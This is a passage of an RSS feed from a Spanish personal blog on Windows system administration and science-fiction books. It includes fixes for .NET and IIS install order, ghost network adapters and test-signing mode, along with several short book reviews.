      <description><![CDATA[<p>Estas son las cosas que pasan por no leerse la documentación del fabricante y preparar el despliegue del producto con un poco de cabeza. Bueno, si habéis llegado hasta aquí es porque este error os está volviendo locos y no sabéis porque aún teniendo instalado los prerrequisitos del OCS no es funciona.<br/><br/>Pues es fácil, habéis instalado el .Net 2.0 antes de haber instalado el IIS 6. Esto es provoca que las extensiones de ASP 2.0 no se hayan registrado durante la instalación del .Net 2.0.<a name='more'></a> <br/><br/>La solución, sencilla. Desinstaláis el .Net 2.0, reiniciáis la maquina y lo volvéis a instalar y listo. Ya podéis continuar con la instalación del OCS.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Calculadora de almacenamiento de Exchange 2007</title>
      <link>https://www.igalvan.es/posts/calculadora-de-almacenamiento-de_7878/</link>
      <pubDate>Sat, 06 Feb 2010 14:20:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/calculadora-de-almacenamiento-de_7878/</guid>
      <description><![CDATA[<p>El peor de los temores de cualquier administrador de sistemas que trabaje con Exchange es cometer errores a la hora de estimar adecuadamente el diseño de la capa de almacenamiento de una instancia.<br /><br />Esto no solo hacer caer en picado el rendimiento, sino que además hace que todo el trabajo realizado se desluzca por no dedicar un par de horas a comprobar estos parámetros. Y es que al final, tendemos a ser muy optimistas en nuestros cálculos y solemos a obviar, algunas veces intencionadamente, cual es la realidad, y esta es simple, nunca hay recursos suficientes ni lo suficientemente rápidos cuando se trata de almacenamiento. Quién no recuerda haber comprado un disco de 100 GB y decir con esto para toda la vida, y luego a los dos meses vernos obligados a comprar uno de 200 GB y así sucesivamente.<br /><a name='more'></a><br /><br />Bueno, a lo que iba, los chicos del Microsoft Exchange Team Blog llevan tiempo manteniendo una hoja Excel que sirve como calculadora para prever según una serie de datos básicos de nuestro diseño, las necesidades que tenemos de almacenamiento. Os paso el enlace y a leerse las instrucciones, que son pocas y sencillas.<br /><br />El enlace: <a href="http://msexchangeteam.com/archive/2007/01/15/432207.aspx" target="_blank" title="Calculadora de almacenamiento de Exchange 2007">Calculadora de almacenamiento de Exchange 2007</a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>100 mejores herramientas de seguridad de código abierto</title>
      <link>https://www.igalvan.es/posts/100-mejores-herramientas-de-seguridad_1810/</link>
      <pubDate>Sat, 23 Jan 2010 09:10:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/100-mejores-herramientas-de-seguridad_1810/</guid>
      <description><![CDATA[<p>Vamos a hacer un poco de apología del software libre.<br/><br/><a href="http://www.jeromiejackson.com/index.php/top-100-security-tools" target="_blank"><a href="http://www.jeromiejackson.com/index.php/top-100-security-tools">http://www.jeromiejackson.com/index.php/top-100-security-tools</a></a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Tarjetas de red &#39;fantasma&#39; duplicadas</title>
      <link>https://www.igalvan.es/posts/tarjetas-de-red-duplicadas_8790/</link>
      <pubDate>Sat, 23 Jan 2010 09:05:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/tarjetas-de-red-duplicadas_8790/</guid>
      <description><![CDATA[<p>Muchas veces cuanto estas configurando las tarjetas de red y te ves forzado a realizar cambios de asignaciones de IP estáticas sueles encontrarte con este mensaje &ldquo;Aparece un mensaje de error al intentar establecer una dirección IP en un adaptador de red del estilo &lsquo;La dirección IP XXX.XXX.XXX.XXX que ha especificado para este adaptador de red ya está asignada a otro adaptador nombre. nombre está oculto en la red &hellip;&rsquo;&rdquo;. Para resolver este problema, hay que desinstalar el adaptador de red &ldquo;fantasma&rdquo; del registro utilizando uno de los métodos siguientes:<a name='more'></a><br/><div><br/><br/><!-- 		@page { margin: 2cm } 		P { margin-bottom: 0.21cm } 		H3 { margin-bottom: 0.21cm } --><br/><h3>Método 1</h3><br/><ol><br/>	<li>Haga clic en <strong>Inicio</strong>, en <strong>Ejecutar</strong>, escriba <strong>cmd.exe</strong> y presione <strong>ENTRAR</strong>.</li><br/>	<li>Escriba <strong>set devmgr_show_nonpresent_devices=1</strong> y presione <strong>ENTRAR</strong>.</li><br/>	<li>Escriba <strong>start DEVMGMT.MSC</strong> y, a continuación, presione <strong>ENTRAR.</strong></li><br/>	<li>Haga clic en <strong>Ver</strong> y en <strong>Mostrar dispositivos ocultos</strong>.</li><br/>	<li>Expanda el árbol <strong>Adaptadores de red</strong>.</li><br/>	<li>Haga clic con el botón secundario del mouse en el <strong>adaptador de red atenuado</strong> y, a continuación, haga clic en <strong>Desinstalar</strong>.</li><br/></ol><br/><h3>Método 2</h3><br/>DevCon es una utilidad de la línea de comandos que actúa como alternativa al Administrador de dispositivos. Mediante DevCon puede habilitar, deshabilitar, reiniciar, actualizar, quitar y consultar dispositivos individuales o grupos de dispositivos. Para utilizar DevCon, siga estos pasos:<br/><ol><br/>	<li>Haga clic en el número de artículo siguiente para verlo en Microsoft Knowledge Base y descargar la herramienta DevCon: 311272  (<a href="http://support.microsoft.com/kb/311272/" target="_blank"><a href="http://support.microsoft.com/kb/311272/">http://support.microsoft.com/kb/311272/</a></a>) La utilidad de línea de comandos DevCon funciona como una alternativa al Administrador de dispositivos.</li><br/>	<li>Desempaquete el archivo binario de la herramienta DevCon de 32 bits o de 64 bits en una carpeta local.</li><br/>	<li>Haga clic en <strong>Inicio</strong>, seleccione <strong>Ejecutar</strong>, escriba <strong>cmd</strong> y, a continuación, presione <strong>ENTRAR</strong>.</li><br/>	<li>Escriba <strong>cd &lt;rutaDeAccesoABinarios&gt;</strong> para ir a donde se encuentra el archivo devcon.exe.</li><br/>	<li>Utilice la sintaxis siguiente para buscar los adaptadores de red instalados:</li><br/></ol><br/><blockquote><strong>devcon findall =net</strong> o</blockquote><br/><blockquote><strong>devcon listclass net </strong></blockquote><br/>Nota: en el resultado de los comandos anteriores, hay una línea para el adaptador de red fantasma que es similar a la siguiente:<br/><br/>PCI\VEN_10B7&amp;DEV_9200&amp;SUBSYS_00D81028&amp;REV_78\4&amp;19FD8D60&amp;0&amp;58F0: 3Com 3C920 Controladora Fast Ethernet integrada (3C905C-TX Compatible)<br/><ol><br/>	<li>Quite el dispositivo fantasma escribiendo la sintaxis siguiente:</li><br/></ol><br/><blockquote><strong>devcon -r remove &ldquo;@PCI\VEN_10B7&amp;DEV_9200&amp;SUBSYS_00D81028&amp;REV_78\4&amp;19FD8D60&amp;0&amp;58F0&rdquo;</strong></blockquote><br/></div></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>¿Cómo salgo del modo de prueba en Windows Vista o 7?</title>
      <link>https://www.igalvan.es/posts/como-salgo-del-modo-de-prueba-en_277/</link>
      <pubDate>Sat, 23 Jan 2010 08:58:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/como-salgo-del-modo-de-prueba-en_277/</guid>
      <description><![CDATA[<p>Si alguna vez habéis tenido que instalar un driver no firmado por Microsoft seguramente habréis acabado viendo el famoso mensaje de “Modo de prueba” en la esquina inferior derecha. Lo más sencillo para solucionarlo una vez os habéis desecho de este driver “malo” es seguir estos pasos.<br/><ol><br/>	<li>Ejecutar cmd.exe como Administrador.</li><br/>	<li>Escribir  <!-- google_ad_section_start --><strong><em>bcdedit /set testsigning off.</em></strong></li><br/>	<li>Reiniciar<strong><em>.</em></strong></li><br/></ol></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Respeto y educación</title>
      <link>https://www.igalvan.es/posts/respeto-y-educacion_1957/</link>
      <pubDate>Sat, 14 Nov 2009 22:17:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/respeto-y-educacion_1957/</guid>
      <description><![CDATA[<p>Hacía bastante tiempo que no leía un artículo tan bueno sobre algo que tanto echo de menos todos los días. Os paso el enlace, espero que lo disfruteis tanto como yo.<a name='more'></a><br/><br/><a href="http://www.elconfidencial.com/sociedad/buenos-modales-educacion-20091114.html" target="_blank"><a href="http://www.elconfidencial.com/sociedad/buenos-modales-educacion-20091114.html">http://www.elconfidencial.com/sociedad/buenos-modales-educacion-20091114.html</a></a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Crónicas marcianas</title>
      <link>https://www.igalvan.es/posts/cronicas-marcianas_4442/</link>
      <pubDate>Sun, 01 Nov 2009 16:26:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/cronicas-marcianas_4442/</guid>
      <description><![CDATA[<p>No, no me refiero el repelente programa que daban en Telecinco hace ya un tiempo, sino a un libro de ciencia ficción escrito por Ray Bradbury hace ya unos cuentos años, más concretamente se escribió en 1950.<br/><br/>Se trata en realidad de una serie de relatos cortos inconexos, pero situados en una misma línea argumental. Más que tratar temas marcianos, lo que Bradbury relata los clásicos temas temas de la humanidad, la guerra, la capacidad autodestructiva del ser humano, el racismo, etc.<br/><br/>Hay que tener en cuenta que Bradbury hace su interpretación desde la sociedad americana de la época en la que se redactaron las historias, por lo que he hay que hacer una doble interpretación, la que pretende el autor más la histórica.<br/><br/>De todas formas, se trata de un libro recomendable, muy fácil de leer y bastante adictivo, desde luego me gustó bastante más que Fahrenheit 451.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Farenheit 451</title>
      <link>https://www.igalvan.es/posts/farenheit-451_7866/</link>
      <pubDate>Mon, 12 Oct 2009 10:16:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/farenheit-451_7866/</guid>
      <description><![CDATA[<p>Buenos, vamos a seguir sumando críticas literarias, aunque en este caso no sea positiva. La verdad, es que a pesar de que soy un apasionado de la ciencia ficción, hasta ahora, no había leído este libro. Y lo siento por los puristas del genero, pero no me ha gustado. Me parece que está lleno de incongruencias, falto de ritmo, es poco imaginativo y pobremente escrito. Lo único que se salva es el propio final, que me parece un desenlace interesante y, por suerte, discordante con la poca calidad del resto del texto.<br/><br/>Quizás es que esperaba demasiado de esta pequeña novela.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>La voz de los muertos</title>
      <link>https://www.igalvan.es/posts/la-voz-de-los-muertos_6658/</link>
      <pubDate>Thu, 10 Sep 2009 20:16:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/la-voz-de-los-muertos_6658/</guid>
      <description><![CDATA[<p>Tengo que reconocerlo, estoy enganchando a la saga de <em>Ender</em>, hoy he tenido el placer de terminar el segundo libro de la saga, <em>La voz de los muertos</em>, y como de costumbre, me lo he tenido que leer casi de un tirón. Increíblemente adictivo, es increíble como <em>Orson Scott</em> es capaz de engancharme con cada línea.<br/><br/>EL libro empieza 3000 años después del primero, en esta ocasión, <em>Ender Wigging</em>, convertido en el P<em>ortavoz de los Muertos</em> decide acudir a la llamada de una joven en un planeta llamado Lusitania y este no es más que el comienzo de otro fascinante libro, que nuevamente, es más interesante por su trasfondo que por la historia en si. <em>Orson Scott</em> da una lección magistral sobre sobre la naturaleza humana y sus relaciones con otras formas de vida inteligente.<br/><br/>Nuevamente, altamente recomendable leer este libro, no dejéis pasar la oportunidad si conseguís un ejemplar, algo complicado dado que está descatalogado, aunque creo que Ediciones Zeta lo está reeditando.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>El juego de Ender</title>
      <link>https://www.igalvan.es/posts/el-juego-de-ender_9284/</link>
      <pubDate>Thu, 03 Sep 2009 20:02:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/el-juego-de-ender_9284/</guid>
      <description><![CDATA[<p>Últimamente me ha dado por leer clásicos de la ciencia-ficción. Esta vez he tenido la oportunidad, y el placer, de conseguir un ejemplar de <em>El juego de Ender</em> de <em>Orson Scott Card</em>.<br/><br/>El argumento de la novela se basa en un futuro hipotético donde la humanidad se enfrenta en una guerra de supervivencia frente a una especie alienigena llamada insectores por su parecido con los insectos terrestres. La esperanza de la humanidad es un pequeño niño llamado <em>Andrew &ldquo;Ender&rdquo; Wiggin</em>, que es reclutado por la <em>Flota Internacional</em> y llevado a una escuela militar llamada <em>Escuela de Batall</em>a, donde es entrenado y manipulado para convertirse en el Gran Almirante que llevará a la flota humana a la victoria. En la <em>Escuela de Batalla</em> demostrará todo su potencial para sobrellevar las adversidades (creadas por el infame coronel <em>Graff</em> )y romper todas las expectativas superándolas ampliamente. Pero, como en casi todo en esta vida, las cosas no son lo que parecen,&hellip; No comento nada más para no reventar la historia, así que ya saben, compren el libro porque realmente merece la pena.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Los viajes de Tuf</title>
      <link>https://www.igalvan.es/posts/los-viajes-de-tuf/</link>
      <pubDate>Fri, 07 Aug 2009 20:17:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/los-viajes-de-tuf/</guid>
      <description><![CDATA[<p>Pocos son los libros que me llaman la atención, sinceramente no es que sea precisamente un literato de gustos refinados, pero si es cierto que trato de buscar literatura que me provoque algún tipo de sensación adicional al propio placer de la lectura. <!--excerpt--></p>
<p>En este caso, y de forma muy agradable, el culpable fue el libro <em>Los viajes de Tuf</em> de George R.R. Martin. El libro en realidad es la recopilación de un pequeño conjunto de historias cortas sobre <em>Haviland Tuf</em>, mercader espacial de poca fortuna que se convierte por azares del destino en el poseedor de una nave espacial con un potencial enorme tanto para crear vida como para destruirla. En ese fino hilo se mueve el personaje durante cada uno de los relatos mostrando su particular forma de ver la vida.</p>
<p>Personalmente, una vez terminado el libro, se me quedo una sonrisa cínica entre los labios y la sensación de que ojala hubiera una segunda parte de esta fascinante narración.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Plataforma ION, el &#39;must&#39; que le faltaba a Atom</title>
      <link>https://www.igalvan.es/posts/plataforma-ion-el-must-que-le-faltaba_atom/</link>
      <pubDate>Wed, 20 May 2009 19:32:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/plataforma-ion-el-must-que-le-faltaba_atom/</guid>
      <description><![CDATA[<p>NVIDIA está intentando dar la campanada en el mundillo de los PC de bajo consumo y, de paso, reventar el mercado de los <em>netbooks</em>. Revisando la página web del producto se le cae a uno la baba, el video en alta definición 1080p y diez veces más capacidad gráfica comparado con los <em>chipsets</em> habituales de Intel en este tipo de equipos hacen que un equipo con esta plataforma sea muy apetecible aunque haya que pagar algo más por ellos (en torno a unos 70 euros). Lo único malo es que no veremos en el mercado netbooks hasta julio o agosto de 2009 y ya veremos a que precio.</p>
<p>Por cierto, si os interesa echarle un vistazo, aquí os dejo al URL a la web de
<a href="http://www.nvidia.com/object/sff_ion.html">ION</a>{:target=&quot;_blank&quot;}</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title></title>
      <link>https://www.igalvan.es/posts/migrate-virtual-machines-from-vmware/</link>
      <pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/migrate-virtual-machines-from-vmware/</guid>
      <description><![CDATA[<p>n&mdash;
title: &ldquo;Migrate virtual machines from a VMware environment to Hyper-V in Windows Server 2012 using a free, simple, standalone tool&rdquo;
date: &lsquo;2012-10-14T10:30:00.001+01:00&rsquo;
author: Ignacio Galván Vitas
tags:</p>
<ul>
<li>Hyper-V</li>
<li>herramientas</li>
<li>VMware
modified_time: &lsquo;2018-03-18T19:25:21.810Z&rsquo;
blogger_id: tag:blogger.com,1999:blog-2905111926096763453.post-7156186289338569441
blogger_orig_url: <a href="http://igalvit.blogspot.com/2012/10/migrate-virtual-machines-from-vmware.html">http://igalvit.blogspot.com/2012/10/migrate-virtual-machines-from-vmware.html</a></li>
</ul>
<hr>
<p>Una herramienta que permite convertir máquinas virtuales desde VMware a Hyper-V <br /><br />Enlace al artículo: <a href="http://blogs.technet.com/b/virtualization/archive/2012/09/18/migrate-virtual-machines-from-a-vmware-environment-to-hyper-v-in-windows-server-2012-using-a-free-simple-standalone-tool.aspx" target="_blank"><a href="http://blogs.technet.com/b/virtualization/archive/2012/09/18/migrate-virtual-machines-from-a-vmware-environment-to-hyper-v-in-windows-server-2012-using-a-free-simple-standalone-tool.aspx">http://blogs.technet.com/b/virtualization/archive/2012/09/18/migrate-virtual-machines-from-a-vmware-environment-to-hyper-v-in-windows-server-2012-using-a-free-simple-standalone-tool.aspx</a></a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Acerca de</title>
      <link>https://www.igalvan.es/acercade/</link>
      <pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/acercade/</guid>
      <description><![CDATA[<p>Soy Ignacio Galván Vitas, entusiasta de la informatica desde que era un niño. Este blog recoge mis divagaciones sobre tecnología, administración de sistemas y lo que se me cruce por el camino.</p>
<p>Puedes contactarme en <a href="mailto:correo@igalvan.es">correo@igalvan.es</a></p>
]]></description>
      
    </item>
    
    
    
    
    
    
  </channel>
</rss>
